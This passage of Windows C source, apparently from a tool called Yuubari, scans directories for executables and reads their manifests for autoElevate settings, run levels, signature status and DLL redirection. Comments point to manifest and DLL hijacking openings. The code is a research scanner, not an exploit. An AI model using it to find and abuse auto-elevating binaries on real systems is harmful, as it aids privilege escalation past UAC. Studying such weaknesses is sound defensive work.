context.\n*\n*/\nNTSTATUS SxsGetTocHeaderFromActivationContext(\n    _In_ PACTIVATION_CONTEXT ActivationContext,\n    _Out_ PACTIVATION_CONTEXT_DATA_TOC_HEADER* TocHeader,\n    _Out_opt_ PACTIVATION_CONTEXT_DATA* ActivationContextData\n)\n{\n    NTSTATUS result = STATUS_UNSUCCESSFUL;\n    ACTIVATION_CONTEXT_DATA* ContextData = NULL;\n    ACTIVATION_CONTEXT_DATA_TOC_HEADER* Header;\n    
WCHAR szLog[0x100];\n\n    if (ActivationContext == NULL)\n        return STATUS_INVALID_PARAMETER_1;\n    if (TocHeader == NULL)\n        return STATUS_INVALID_PARAMETER_2;\n\n    __try {\n\n        do {\n\n            RtlSecureZeroMemory(szLog, sizeof(szLog));\n\n            ContextData = ActivationContext->ActivationContextData;\n\n            if (ContextData->Magic != ACTIVATION_CONTEXT_DATA_MAGIC) {\n                wsprintf(szLog, TEXT(\"ActivationContext Magic = %lx invalid\"), ContextData->Magic);\n                break;\n            }\n\n            if (\n                (ContextData->HeaderSize != sizeof(ACTIVATION_CONTEXT_DATA)) ||\n                (ContextData->HeaderSize > ContextData->TotalSize)\n                )\n            {\n                wsprintf(szLog, TEXT(\"Unexpected data HeaderSize = %lu\"), ContextData->HeaderSize);\n                break;\n            }\n\n            if (ContextData->DefaultTocOffset > ContextData->TotalSize) {\n                wsprintf(szLog, TEXT(\"Unexpected Toc offset %lx\"), ContextData->DefaultTocOffset);\n                break;\n            }\n\n            Header = (ACTIVATION_CONTEXT_DATA_TOC_HEADER*)(((LPBYTE)ContextData) + ContextData->DefaultTocOffset);\n            if (Header->HeaderSize != sizeof(ACTIVATION_CONTEXT_DATA_TOC_HEADER)) {\n                wsprintf(szLog, TEXT(\"Unexpected Toc HeaderSize %lu\"), Header->HeaderSize);\n                break;\n            }\n\n            if ((Header->FirstEntryOffset != 0) && (Header->EntryCount == 0)) {\n                wsprintf(szLog, TEXT(\"Unexpected EntryCount %lu\"), Header->EntryCount);\n                break;\n            }\n\n            if ((Header->EntryCount > 0) && (Header->FirstEntryOffset == 0)) {\n                wsprintf(szLog, TEXT(\"Unexpected Toc FirstEntryOffset %lu\"), Header->FirstEntryOffset);\n                break;\n            }\n\n            if (Header->FirstEntryOffset > ContextData->TotalSize) {\n                wsprintf(szLog, 
TEXT(\"Toc FirstEntry offset = %lu invalid\"), Header->FirstEntryOffset);\n                break;\n            }\n\n            *TocHeader = Header;\n            if (ActivationContextData != NULL)\n                *ActivationContextData = ContextData;\n\n            result = STATUS_SUCCESS;\n\n        } while (FALSE);\n\n        if (!NT_SUCCESS(result)) {\n            OutputDebugString(szLog);\n            return STATUS_SXS_CORRUPTION;\n        }\n    }\n    __except (EXCEPTION_EXECUTE_HANDLER) {\n        return STATUS_SXS_CORRUPTION;\n    }\n    return result;\n}\n\n/*\n* SxsAllocInitUnicodeString\n*\n* Purpose:\n*\n* Allocates a buffer, copies a UNICODE string from the specified offset and length\n* of a section header, and initializes a UNICODE_STRING structure.\n*\n*/\nNTSTATUS SxsAllocInitUnicodeString(\n    _In_ LPVOID SectionHeader,\n    _In_ SIZE_T Offset,\n    _In_ SIZE_T Length,\n    _Out_ UNICODE_STRING* Destination\n)\n{\n    WCHAR* Buffer;\n\n    if (!Destination || !SectionHeader || !Length)\n        return STATUS_INVALID_PARAMETER;\n\n    //\n    // Allocate memory for string with space for NULL-terminator.\n    //\n    Buffer = (WCHAR*)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, Length + sizeof(UNICODE_NULL));\n    if (!Buffer)\n        return STATUS_NO_MEMORY;\n\n    __try {\n        RtlCopyMemory(\n            Buffer,\n            (PBYTE)SectionHeader + Offset,\n            Length\n        );\n        RtlInitUnicodeString(Destination, Buffer);\n    }\n    __except (EXCEPTION_EXECUTE_HANDLER) {\n        RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Buffer);\n        return STATUS_SXS_CORRUPTION;\n    }\n\n    return STATUS_SUCCESS;\n}\n\n/*\n* SxsGetStringSectionRedirectionDlls\n*\n* Purpose:\n*\n* Extracts redirection DLLs from a string section entry and populates a DLL redirection list.\n*\n*/\nNTSTATUS SxsGetStringSectionRedirectionDlls(\n    _In_ ACTIVATION_CONTEXT_STRING_SECTION_HEADER* SectionHeader,\n    _In_ 
ACTIVATION_CONTEXT_STRING_SECTION_ENTRY* StringEntry,\n    _Inout_ PDLL_REDIRECTION_LIST DllList\n)\n{\n    ULONG SegmentIndex;\n    NTSTATUS result = STATUS_SXS_KEY_NOT_FOUND, status;\n    DLL_REDIRECTION_LIST_ENTRY* DllListEntry;\n    ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_SEGMENT* DllPathSegment;\n    ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION* DataDll;\n\n    if (!DllList)\n        return result;\n\n    __try {\n        DataDll = (ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION*)(((LPBYTE)SectionHeader) + StringEntry->Offset);\n\n        if (!DataDll || !DataDll->PathSegmentOffset || DataDll->PathSegmentCount == 0)\n            return result;\n\n        DllPathSegment = (ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_SEGMENT*)(((LPBYTE)SectionHeader) + DataDll->PathSegmentOffset);\n\n        for (SegmentIndex = 0; SegmentIndex < DataDll->PathSegmentCount; SegmentIndex++) {\n            if (DllPathSegment && DllPathSegment->Length && DllPathSegment->Offset) {\n                DllListEntry = (DLL_REDIRECTION_LIST_ENTRY*)\n                    RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, sizeof(DLL_REDIRECTION_LIST_ENTRY));\n\n                if (DllListEntry) {\n                    \n                    status = SxsAllocInitUnicodeString(\n                        SectionHeader,\n                        StringEntry->KeyOffset,\n                        StringEntry->KeyLength,\n                        &DllListEntry->KeyName);\n\n                    if (!NT_SUCCESS(status)) {\n                        RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, DllListEntry);\n                        if (status == STATUS_SXS_CORRUPTION)\n                            return status;\n                        continue;\n                    }\n\n                    status = SxsAllocInitUnicodeString(\n                        SectionHeader,\n                        DllPathSegment->Offset,\n                        DllPathSegment->Length,\n                        
&DllListEntry->DllName);\n\n                    if (!NT_SUCCESS(status)) {\n                        RtlFreeUnicodeString(&DllListEntry->KeyName);\n                        RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, DllListEntry);\n                        if (status == STATUS_SXS_CORRUPTION)\n                            return status;\n                        continue;\n                    }\n\n                    RtlInterlockedPushEntrySList(&DllList->Header, &DllListEntry->ListEntry);\n                }\n            }\n\n            DllPathSegment = (ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_SEGMENT*)\n                (((LPBYTE)DllPathSegment) + sizeof(ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_SEGMENT));\n        }\n\n        result = STATUS_SUCCESS;\n    }\n    __except (EXCEPTION_EXECUTE_HANDLER) {\n        return STATUS_SXS_CORRUPTION;\n    }\n\n    return result;\n}\n\n/*\n* SxsGetDllRedirectionFromActivationContext\n*\n* Purpose:\n*\n* Query redirection dll list from activation context data.\n*\n*/\nNTSTATUS SxsGetDllRedirectionFromActivationContext(\n    _In_ PACTIVATION_CONTEXT ActivationContext,\n    _In_ PDLL_REDIRECTION_LIST DllList\n)\n{\n    ULONG i, j;\n    NTSTATUS result = STATUS_UNSUCCESSFUL, status;\n    ACTIVATION_CONTEXT_DATA* ContextData = NULL;\n    ACTIVATION_CONTEXT_DATA_TOC_HEADER* TocHeader = NULL;\n    ACTIVATION_CONTEXT_DATA_TOC_ENTRY* TocEntry = NULL;\n    ACTIVATION_CONTEXT_STRING_SECTION_HEADER* SectionHeader = NULL;\n    ACTIVATION_CONTEXT_STRING_SECTION_ENTRY* StringEntry = NULL;\n\n    WCHAR szLog[0x100];\n\n    __try {\n\n        if (ActivationContext == NULL)\n            return STATUS_INVALID_PARAMETER_1;\n        if (DllList == NULL)\n            return STATUS_INVALID_PARAMETER_2;\n\n        do {\n            if (!NT_SUCCESS(SxsGetTocHeaderFromActivationContext(ActivationContext, &TocHeader, &ContextData)))\n                break;\n\n            TocEntry = (ACTIVATION_CONTEXT_DATA_TOC_ENTRY*)(((LPBYTE)ContextData) + 
TocHeader->FirstEntryOffset);\n\n            RtlInitializeSListHead(&DllList->Header);\n\n            i = 1;\n            while (i < TocHeader->EntryCount) {\n                if (TocEntry->Format == ACTIVATION_CONTEXT_SECTION_FORMAT_STRING) {\n                    SectionHeader = (ACTIVATION_CONTEXT_STRING_SECTION_HEADER*)(((LPBYTE)ContextData) + TocEntry->Offset);\n                    if (SectionHeader->Magic != ACTIVATION_CONTEXT_STRING_SECTION_MAGIC) {\n                        wsprintf(szLog, TEXT(\"Section Magic = %lx invalid\"), SectionHeader->Magic);\n                        OutputDebugString(szLog);\n                        break;\n                    }\n                    if (SectionHeader->HeaderSize != sizeof(ACTIVATION_CONTEXT_STRING_SECTION_HEADER)) {\n                        wsprintf(szLog, TEXT(\"Unexpected Section HeaderSize = %lu\"), SectionHeader->HeaderSize);\n                        OutputDebugString(szLog);\n                        break;\n                    }\n\n                    if (TocEntry->Id == ACTIVATION_CONTEXT_SECTION_DLL_REDIRECTION) {\n                        StringEntry = (ACTIVATION_CONTEXT_STRING_SECTION_ENTRY*)(((LPBYTE)SectionHeader) + SectionHeader->ElementListOffset);\n                        status = SxsGetStringSectionRedirectionDlls(SectionHeader, StringEntry, DllList);\n\n                        //\n                        // If the first element is corrupted, skip the remaining elements of this section.\n                        // A bare 'continue' here would restart the while loop without advancing\n                        // TocEntry and i, so the loop would never terminate.\n                        //\n                        if (status != STATUS_SXS_CORRUPTION) {\n                            for (j = 1; j < SectionHeader->ElementCount; j++) {\n                                StringEntry = (ACTIVATION_CONTEXT_STRING_SECTION_ENTRY*)(((LPBYTE)StringEntry) + sizeof(ACTIVATION_CONTEXT_STRING_SECTION_ENTRY));\n                                status = SxsGetStringSectionRedirectionDlls(SectionHeader, StringEntry, DllList);\n                                if (status == STATUS_SXS_CORRUPTION)\n                                    continue;\n                            }\n                        }\n                    }\n                }\n                TocEntry = 
(ACTIVATION_CONTEXT_DATA_TOC_ENTRY*)(((LPBYTE)TocEntry) + sizeof(ACTIVATION_CONTEXT_DATA_TOC_ENTRY));\n                i += 1;\n            } //while (i < TocHeader->EntryCount)\n\n            DllList->Depth = RtlQueryDepthSList(&DllList->Header);\n            result = (DllList->Depth == 0) ? STATUS_SXS_SECTION_NOT_FOUND : STATUS_SUCCESS;\n\n        } while (FALSE);\n\n    }\n    __except (EXCEPTION_EXECUTE_HANDLER) {\n        return STATUS_SXS_CORRUPTION;\n    }\n\n    return result;\n}\n\n/*\n* FusionProbeForRedirectedDlls\n*\n* Purpose:\n*\n* Probe activation context for redirection dlls and output them if found.\n*\n*/\nNTSTATUS FusionProbeForRedirectedDlls(\n    _In_ LPWSTR lpFileName,\n    _In_ ACTIVATION_CONTEXT* ActivationContext,\n    _In_ OUTPUTCALLBACK OutputCallback\n)\n{\n    NTSTATUS status;\n    SLIST_ENTRY* ListEntry = NULL;\n    DLL_REDIRECTION_LIST_ENTRY* DllData = NULL;\n    UAC_FUSION_DATA_DLL FusionRedirectedDll;\n    DLL_REDIRECTION_LIST DllList;\n\n    __try {\n        RtlSecureZeroMemory(&DllList, sizeof(DllList));\n        status = SxsGetDllRedirectionFromActivationContext(ActivationContext, &DllList);\n        if (NT_SUCCESS(status)) {\n            while (DllList.Depth) {\n                ListEntry = RtlInterlockedPopEntrySList(&DllList.Header);\n                if (ListEntry) {\n                    DllData = (PDLL_REDIRECTION_ENTRY)ListEntry;\n                    RtlSecureZeroMemory(&FusionRedirectedDll, sizeof(FusionRedirectedDll));\n                    FusionRedirectedDll.DataType = UacFusionDataRedirectedDllType;\n                    FusionRedirectedDll.FileName = lpFileName;\n                    FusionRedirectedDll.KeyName = DllData->KeyName.Buffer;\n                    FusionRedirectedDll.DllName = DllData->DllName.Buffer;\n                    OutputCallback((PVOID)&FusionRedirectedDll);\n\n                    RtlFreeUnicodeString(&DllData->DllName);\n                    RtlFreeUnicodeString(&DllData->KeyName);\n                    
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, DllData);\n                }\n                DllList.Depth--;\n            }\n            RtlInterlockedFlushSList(&DllList.Header);\n        }\n    }\n    __except (EXCEPTION_EXECUTE_HANDLER) {\n        return STATUS_SXS_CORRUPTION;\n    }\n    return status;\n}\n\n/*\n* FusionCheckFile\n*\n* Purpose:\n*\n* Query file manifest data related to security.\n*\n*/\nVOID FusionCheckFile(\n    _In_ LPWSTR lpDirectory,\n    _In_ WIN32_FIND_DATA* fdata,\n    _In_ OUTPUTCALLBACK OutputCallback\n)\n{\n    DWORD               lastError;\n    NTSTATUS            status;\n    HANDLE              hFile = NULL, hSection = NULL, hActCtx = INVALID_HANDLE_VALUE;\n    LPWSTR              FileName = NULL, pt = NULL;\n    PBYTE               DllBase = NULL;\n    SIZE_T              DllVirtualSize, sz, l;\n    OBJECT_ATTRIBUTES   attr;\n    UNICODE_STRING      usFileName;\n    IO_STATUS_BLOCK     iosb;\n    ULONG_PTR           ResourceSize = 0;\n    ULONG_PTR           IdPath[3];\n\n    ACTCTX      ctx;\n\n    SIGNATURE_INFO sigData;\n    UAC_FUSION_DATA FusionCommonData;\n    ACTIVATION_CONTEXT_RUN_LEVEL_INFORMATION ctxrl;\n    WCHAR           szValue[100];\n\n    usFileName.Buffer = NULL;\n\n    do {\n\n        if ((lpDirectory == NULL) || (fdata == NULL))\n            break;\n\n        if (fdata->dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)\n            break;\n\n        sz = (_strlen(lpDirectory) + _strlen(fdata->cFileName) + 2) * sizeof(WCHAR); // +2 for NULL and possible '\\'\n        sz = ALIGN_UP_BY(sz, PAGE_SIZE);\n        FileName = (LPWSTR)VirtualAlloc(NULL, sz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\n        if (FileName == NULL)\n            break;\n\n        pt = FileName;\n\n        _strcpy(FileName, lpDirectory);\n        l = _strlen(FileName);\n        if (pt[l - 1] != L'\\\\') {\n            pt[l] = L'\\\\';\n            pt[l + 1] = 0;\n        }\n\n        if (l + _strlen(fdata->cFileName) < sz / sizeof(WCHAR)) {\n      
      _strcat(FileName, fdata->cFileName);\n        }\n        else {\n            break; // Path too long, skip this file\n        }\n\n        if (RtlDosPathNameToNtPathName_U(FileName, &usFileName, NULL, NULL) == FALSE)\n            break;\n\n        InitializeObjectAttributes(&attr, &usFileName,\n            OBJ_CASE_INSENSITIVE, NULL, NULL);\n        RtlSecureZeroMemory(&iosb, sizeof(iosb));\n\n        //\n        // Open file and map it.\n        //\n        status = NtCreateFile(&hFile, SYNCHRONIZE | FILE_READ_DATA,\n            &attr, &iosb, NULL, 0, FILE_SHARE_READ, FILE_OPEN,\n            FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);\n\n        if (!NT_SUCCESS(status))\n            break;\n\n        status = NtCreateSection(&hSection, SECTION_ALL_ACCESS, NULL,\n            NULL, PAGE_READONLY, SEC_IMAGE, hFile);\n        if (!NT_SUCCESS(status))\n            break;\n\n        DllBase = NULL;\n        DllVirtualSize = 0;\n        status = NtMapViewOfSection(hSection, NtCurrentProcess(), (PVOID*)&DllBase,\n            0, 0, NULL, &DllVirtualSize, ViewUnmap, 0, PAGE_READONLY);\n        if (!NT_SUCCESS(status))\n            break;\n\n        RtlSecureZeroMemory(&FusionCommonData, sizeof(FusionCommonData));\n        FusionCommonData.Name = FileName;\n\n        //\n        // Look for embedded manifest resource\n        //\n        IdPath[0] = (ULONG_PTR)RT_MANIFEST;\n        IdPath[1] = (ULONG_PTR)CREATEPROCESS_MANIFEST_RESOURCE_ID;\n        IdPath[2] = 0;\n        status = LdrResSearchResource(DllBase, (ULONG_PTR*)&IdPath, 3, 0,\n            (LPVOID*)&pt, (ULONG_PTR*)&ResourceSize, NULL, NULL);\n\n        FusionCommonData.IsFusion = NT_SUCCESS(status);\n\n        //\n        // File has no manifest embedded.\n        //\n        if (FusionCommonData.IsFusion == FALSE) {\n            switch (status) {\n            case STATUS_RESOURCE_TYPE_NOT_FOUND:\n                OutputDebugString(TEXT(\"LdrResSearchResource: resource type not found\\r\\n\"));\n                
break;\n            case STATUS_RESOURCE_DATA_NOT_FOUND:\n                OutputDebugString(TEXT(\"LdrResSearchResource: resource data not found\\r\\n\"));\n                break;\n            case STATUS_RESOURCE_NAME_NOT_FOUND:\n                OutputDebugString(TEXT(\"LdrResSearchResource: resource name not found\\r\\n\"));\n                break;\n            default:\n                break;\n            }\n\n            //\n            // No embedded manifest, possible manifest hijacking for versions below RS1\n            //\n            if (\n                (status == STATUS_RESOURCE_TYPE_NOT_FOUND) ||\n                (status == STATUS_RESOURCE_DATA_NOT_FOUND) ||\n                (status == STATUS_RESOURCE_NAME_NOT_FOUND)\n                ) {\n                if (WTGetSignatureInfo != NULL) {\n                    //\n                    // Check if file is signed as part of an operation system\n                    //\n                    RtlSecureZeroMemory(&sigData, sizeof(sigData));\n                    sigData.cbSize = sizeof(sigData);\n                    status = WTGetSignatureInfo(FileName, hFile,\n                        SIF_BASE_VERIFICATION | SIF_CHECK_OS_BINARY | SIF_CATALOG_SIGNED,\n                        &sigData,\n                        NULL, NULL);\n                    if (NT_SUCCESS(status)) {\n                        if (sigData.fOSBinary != FALSE) {\n\n                            RtlSecureZeroMemory(&FusionCommonData, sizeof(FusionCommonData));\n                            FusionCommonData.Name = FileName;\n                            FusionCommonData.IsOSBinary = TRUE;\n\n                            //\n                            // Check if signature valid or trusted\n                            //\n                            FusionCommonData.IsSignatureValidOrTrusted = ((sigData.SignatureState == SIGNATURE_STATE_TRUSTED) ||\n                                (sigData.SignatureState == SIGNATURE_STATE_VALID));\n\n                       
     OutputCallback((PVOID)&FusionCommonData);\n                        }\n                    }\n                }\n                else { //WTGetSignatureInfo != NULL\n\n                    //\n                    // On Windows 7 this API is not available, just output result.\n                    //\n                    RtlSecureZeroMemory(&FusionCommonData, sizeof(FusionCommonData));\n                    FusionCommonData.Name = FileName;\n                    OutputCallback((PVOID)&FusionCommonData);\n                }\n            }\n\n            //break the global loop\n            break;\n        }\n\n        //\n        // File has manifest, create activation context for it.\n        //\n        RtlSecureZeroMemory(&ctx, sizeof(ctx));\n        ctx.cbSize = sizeof(ACTCTX);\n        ctx.dwFlags = ACTCTX_FLAG_RESOURCE_NAME_VALID | ACTCTX_FLAG_HMODULE_VALID;\n        ctx.lpResourceName = CREATEPROCESS_MANIFEST_RESOURCE_ID;\n        ctx.lpSource = FileName;\n        ctx.hModule = (HMODULE)DllBase;\n\n        hActCtx = CreateActCtx(&ctx);\n        if (hActCtx == INVALID_HANDLE_VALUE) {\n            lastError = GetLastError();\n            RtlSecureZeroMemory(szValue, sizeof(szValue));\n            _strcpy(szValue, TEXT(\"Unexpected activation context failure =\"));\n            ultostr(lastError, _strend(szValue));\n            _strcat(szValue, TEXT(\"\\r\\n\"));\n            OutputDebugString(szValue);\n            break;\n        }\n\n        //\n        // Query run level and uiAccess information.\n        //\n        RtlSecureZeroMemory(&ctxrl, sizeof(ctxrl));\n        status = RtlQueryInformationActivationContext(RTL_QUERY_INFORMATION_ACTIVATION_CONTEXT_FLAG_NO_ADDREF,\n            (PCACTIVATION_CONTEXT)hActCtx,\n            NULL,\n            RunlevelInformationInActivationContext,\n            (PVOID)&ctxrl,\n            sizeof(ACTIVATION_CONTEXT_RUN_LEVEL_INFORMATION),\n            NULL);\n\n        if (NT_SUCCESS(status)) {\n            
RtlCopyMemory(&FusionCommonData.RunLevel, &ctxrl, sizeof(ACTIVATION_CONTEXT_RUN_LEVEL_INFORMATION));\n        }\n\n        //\n        // DotNet application highly vulnerable for Dll Hijacking attacks.\n        // Always check if file is DotNet origin.\n        //\n        FusionCommonData.IsDotNet = supIsCorImageFile(DllBase);\n\n        //\n        // Query autoelevate setting.\n        //\n        l = 0;\n        RtlSecureZeroMemory(&szValue, sizeof(szValue));\n        status = RtlQueryActivationContextApplicationSettings(0, hActCtx, NULL, TEXT(\"autoElevate\"), (PWSTR)&szValue, sizeof(szValue), &l);\n        if (NT_SUCCESS(status)) {\n\n            //\n            // Actually appinfo only looks for 'T' or 't' symbol \n            // for performance reasons perhaps\n            //\n            if (_strcmpi(szValue, TEXT(\"true\")) == 0)\n                FusionCommonData.AutoElevateState = AutoElevateEnabled;\n            else\n                //\n                // Several former autoelevate applications has autoelevated strictly \n                // disabled in manifest as part of their UAC fixes.\n                //\n                if (_strcmpi(szValue, TEXT(\"false\")) == 0)\n                    FusionCommonData.AutoElevateState = AutoElevateDisabled;\n        }\n        else {\n\n            //\n            // Check specific \"exempted\" autoelevated files, they may not have \"autoelevate\" in manifest.\n            //\n            if (IsExemptedAutoApproveEXE(FileName, hFile)) {\n                FusionCommonData.AutoElevateState = AutoElevateExempted;\n            }\n\n            //\n            // Query settings failed, check if it known error like sxs key not exist.         
\n            //\n            if (status != STATUS_SXS_KEY_NOT_FOUND) {\n                RtlSecureZeroMemory(szValue, sizeof(szValue));\n                _strcpy(szValue, TEXT(\"QueryActivationContext error =\"));\n                ultostr(status, _strend(szValue));\n                _strcat(szValue, TEXT(\"\\r\\n\"));\n                OutputDebugString(szValue);\n\n                //\n                // Don't output anything, just break, it is unexpected situation.\n                //\n                break;\n            }\n        }\n\n        //\n        // Even if autoElevate key could be not found, application still can be in whitelist.\n        // As in case of inetmgr.exe on RS1+, so check if it has redirection dlls.\n        //\n        OutputCallback((PVOID)&FusionCommonData);\n\n        //\n        // Print redirection dlls from activation context\n        //       \n        FusionProbeForRedirectedDlls(FileName, (PACTIVATION_CONTEXT)hActCtx, OutputCallback);\n\n\n    } while (FALSE);\n\n    if (hActCtx != INVALID_HANDLE_VALUE)\n        ReleaseActCtx(hActCtx);\n\n    if (usFileName.Buffer != NULL)\n        RtlFreeUnicodeString(&usFileName);\n\n    if (DllBase != NULL)\n        NtUnmapViewOfSection(NtCurrentProcess(), DllBase);\n\n    if (hSection != NULL)\n        NtClose(hSection);\n\n    if (hFile != NULL)\n        NtClose(hFile);\n\n    if (FileName != NULL)\n        VirtualFree(FileName, 0, MEM_RELEASE);\n}\n\n/*\n* FusionScanFiles\n*\n* Purpose:\n*\n* Scan directory for files of given type.\n*\n*/\nVOID FusionScanFiles(\n    _In_ LPWSTR lpDirectory,\n    _In_ OUTPUTCALLBACK OutputCallback\n)\n{\n    HANDLE hFile;\n    LPWSTR lpLookupDirectory = NULL;\n    SIZE_T sz;\n    WIN32_FIND_DATA fdata;\n\n    sz = (_strlen(lpDirectory) + MAX_PATH) * sizeof(WCHAR);\n    lpLookupDirectory = (LPWSTR)supHeapAlloc(sz);\n    if (lpLookupDirectory) {\n        _strncpy(lpLookupDirectory, MAX_PATH, lpDirectory, MAX_PATH);\n        _strcat(lpLookupDirectory, 
TEXT(\"\\\\*.exe\"));\n\n        hFile = FindFirstFile(lpLookupDirectory, &fdata);\n        if (hFile != INVALID_HANDLE_VALUE) {\n            do {\n                FusionCheckFile(lpDirectory, &fdata, OutputCallback);\n            } while (FindNextFile(hFile, &fdata));\n            FindClose(hFile);\n        }\n        supHeapFree(lpLookupDirectory);\n    }\n}\n\n/*\n* FusionScanDirectory\n*\n* Purpose:\n*\n* Recursively scan directories.\n*\n*/\nVOID FusionScanDirectory(\n    _In_ LPWSTR lpDirectory,\n    _In_ OUTPUTCALLBACK OutputCallback\n)\n{\n    SIZE_T              cchBuffer;\n    HANDLE              hDirectory;\n    LPWSTR              lpFilePath;\n    WIN32_FIND_DATA     fdata;\n\n    FusionScanFiles(lpDirectory, OutputCallback);\n\n    cchBuffer = 4 + MAX_PATH + _strlen(lpDirectory);\n    lpFilePath = (LPWSTR)supHeapAlloc(cchBuffer * sizeof(WCHAR));\n    if (lpFilePath) {\n\n        _strcpy(lpFilePath, lpDirectory);\n        supConcatenatePaths(lpFilePath, L\"*\", cchBuffer);\n\n        hDirectory = FindFirstFile(lpFilePath, &fdata);\n        if (hDirectory != INVALID_HANDLE_VALUE) {\n            do {\n                if ((fdata.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) &&\n                    (fdata.cFileName[0] != L'.')\n                    )\n                {\n                    _strcpy(lpFilePath, lpDirectory);\n                    supConcatenatePaths(lpFilePath, fdata.cFileName, cchBuffer);\n                    FusionScanDirectory(lpFilePath, OutputCallback);\n                }\n            } while (FindNextFile(hDirectory, &fdata));\n            FindClose(hDirectory);\n        }\n\n        supHeapFree(lpFilePath);\n    }\n}\n"
  },
  {
    "path": "Source/Yuubari/fusion.h",
    "content": "#/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2014 - 2026\n*\n*  TITLE:       FUSION.H\n*\n*  VERSION:     1.61\n*\n*  DATE:        12 Feb 2026\n*\n*  Header file for the autoelevated applications scan.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n#define UacFusionDataCommonType         0\n#define UacFusionDataRedirectedDllType  1\n\ntypedef enum {\n    AutoElevateUnspecified = 0,\n    AutoElevateDisabled = 1,\n    AutoElevateEnabled = 2,\n    AutoElevateExempted = 3\n} AUTOELEVATESTATE;\n\ntypedef struct _UAC_FUSION_DATA {\n    DWORD DataType;\n    LPWSTR Name;\n    ACTIVATION_CONTEXT_RUN_LEVEL_INFORMATION RunLevel;\n    AUTOELEVATESTATE AutoElevateState;\n    BOOL IsFusion;\n    BOOL IsDotNet;\n    BOOL IsOSBinary;\n    BOOL IsSignatureValidOrTrusted;\n} UAC_FUSION_DATA, *PUAC_FUSION_DATA;\n\ntypedef struct _UAC_FUSION_DATA_DLL {\n    DWORD DataType;\n    LPWSTR FileName;\n    LPWSTR KeyName;\n    LPWSTR DllName;\n} UAC_FUSION_DATA_DLL, *PUAC_FUSION_DATA_DLL;\n\ntypedef struct _DLL_REDIRECTION_LIST_ENTRY {\n    SLIST_ENTRY ListEntry;\n    //For release RtlFreeUnicodeString used, Buffer of both allocated in Process Heap\n    UNICODE_STRING KeyName;\n    UNICODE_STRING DllName; \n} DLL_REDIRECTION_LIST_ENTRY, *PDLL_REDIRECTION_ENTRY;\n\ntypedef struct _DLL_REDIRECTION_LIST {\n    SLIST_HEADER Header;\n    ULONG Depth;\n} DLL_REDIRECTION_LIST, *PDLL_REDIRECTION_LIST;\n\nNTSTATUS SxsGetDllRedirectionFromActivationContext(\n    _In_ PACTIVATION_CONTEXT ActivationContext,\n    _In_ PDLL_REDIRECTION_LIST DllList);\n\nVOID FusionScanDirectory(\n    _In_ LPWSTR lpDirectory,\n    _In_ OUTPUTCALLBACK 
OutputCallback);\n\nextern ptrWTGetSignatureInfo WTGetSignatureInfo;\n"
  },
  {
    "path": "Source/Yuubari/global.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2014 - 2022\n*\n*  TITLE:       GLOBAL.H\n*\n*  VERSION:     1.54\n*\n*  DATE:        02 Dec 2022\n*\n*  Common header file for the program support routines.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n#if !defined UNICODE\n#error ANSI build is not supported\n#endif\n\n#include \"shared\\libinc.h\"\n\n//disable nonmeaningful warnings.\n#pragma warning(disable: 4005)  // macro redefinition\n#pragma warning(disable: 4055)  // %s : from data pointer %s to function pointer %s\n#pragma warning(disable: 4091)  // 'typedef ': ignored on left of '' when no variable is declared\n#pragma warning(disable: 4152)  // nonstandard extension, function/data pointer conversion in expression\n#pragma warning(disable: 4201)  // nonstandard extension used : nameless struct/union\n#pragma warning(disable: 6320)  // exception-filter expression is the constant EXCEPTION_EXECUTE_HANDLER\n\n#include <Windows.h>\n#include <ntstatus.h>\n#include <CommCtrl.h>\n#include \"shared\\ntos\\ntos.h\"\n#include \"shared\\ntos\\ntsxs.h\"\n#include \"shared\\ntos\\ntbuilds.h\"\n#include \"shared\\minirtl.h\"\n#include \"shared\\_filename.h\"\n#include \"shared\\cmdline.h\"\n#include \"consts.h\"\n#include \"logger.h\"\n#include \"wintrustex.h\"\n#include \"sup.h\"\n#include \"cui.h\"\n\ntypedef VOID(WINAPI *OUTPUTCALLBACK)(PVOID OutputData);\n\n#include \"appinfo.h\"\n#include \"basic.h\"\n#include \"comobj.h\"\n#include \"fusion.h\"\n#ifdef _DEBUG\n#include \"tests\\test_fusion.h\"\n#endif\n\nextern ULONG g_NtBuildNumber;\nextern BOOL g_VerboseOutput;\n\n"
  },
  {
    "path": "Source/Yuubari/logger.c",
